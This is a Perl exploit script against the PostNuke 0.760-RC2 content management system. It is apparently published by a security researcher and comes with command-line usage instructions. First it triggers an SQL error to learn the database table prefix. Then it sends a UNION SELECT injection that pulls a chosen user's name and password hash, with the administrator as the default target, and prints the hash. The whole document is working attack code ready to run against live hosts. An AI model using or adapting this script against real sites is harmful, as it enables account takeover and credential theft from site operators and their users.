#!/usr/bin/perl
use IO::Socket;
# Maksymilian Arciemowicz
#
# GPG http://cxsecurity.com/gpg/key.pgp
# Ctitical SQL INCJECTION
# POSTNUKE 0.760-RC2=>x
#
#
# thx sp3x,nagash(from T-NAS),ladyBMS
# CXSecurity
if (@ARGV < 3)
{
print "[cXIb8O3] EXPLOIT for PostNuke 0.760-RC2=>x\r\n";
print " \r\n";
print "perl pn-0760RC2-cXIb8O3.pl HOST /DIR/ USER_ID\r\n\r\n";
print "HOST - Host where is postnuke example: http://localhost\r\n";
print "DIR - Directory to PN example: /PostNuke-0.760-RC2/html/\r\n";
print "UID - standart Admin=2\r\n\r\n";
print "example cmd: perl pn-0760RC2-cXIb8O3.pl http://localhost /html/ 2\r\n\r\n";
exit();
}
$HOST = $ARGV[0];
$DIR = $ARGV[1];
$UID = $ARGV[2];
print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;
$path .= $DIR;
$path .= "index.php?catid='cXIb8O3";
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";
print $get1 "GET $path HTTP/1.1\r\n";
print $get1 "Host: $HOST\r\n";
print $get1 "Accept: */*\r\n";
print $get1 "Connection: close\r\n\r\n";
while ($odp = <$get1>)
{ if ($odp =~ /ORDER BY (.*)stories.pn_time/) {
$exploit .= $DIR;
$exploit .= "index.php?catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20";
$exploit .= $1;
$exploit .= "users%20WHERE%20pn_uid=";
$exploit .= $UID;
$exploit .= "/* ";
print "\r\nDB PREFIX IS: ".$1."\r\n\r\n";
$get2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";
print $get2 "GET $exploit HTTP/1.1\r\n";
print $get2 "Host: $HOST\r\n";
print $get2 "Accept: */*\r\n";
print $get2 "Connection: close\r\n\r\n";
while ($odpi = <$get2>)
{
if ($odpi =~ /0">([0-9a-f]{32})<\/a>/ ) {
printf "Password for a user with id ".$UID." is ".$1."\r\n\r\n";
}}}}